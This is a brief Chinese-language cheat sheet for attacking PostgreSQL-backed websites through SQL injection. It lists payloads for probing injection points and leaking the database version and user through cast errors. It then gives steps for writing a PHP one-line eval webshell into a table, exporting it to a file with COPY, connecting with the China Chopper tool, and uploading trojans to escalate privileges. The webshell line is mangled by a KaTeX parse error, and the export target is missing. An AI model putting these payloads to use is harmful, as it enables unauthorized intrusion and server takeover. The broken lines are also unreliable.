日常判断注入点
’
and 1=1
and 1=2
通过一些函数来获取数据库的基本信息
and 1=cast(version() as int) 获取数据库版本信息 系统信息
and 1=cast(user||123 as int) 获取当前用户名称
创建表
;create table xxx(w text not null);
向表中插入一句话木马
;insert into xxx values (KaTeX parse error: Can't use function '$' in math mode at position 13: <?php @eval($̲_POST[密码]);>?);
将表导出,保存至目标文件
;copy xxx(w) to
;
用菜刀连接一句话木马文件获取后台文件
上传木马…提权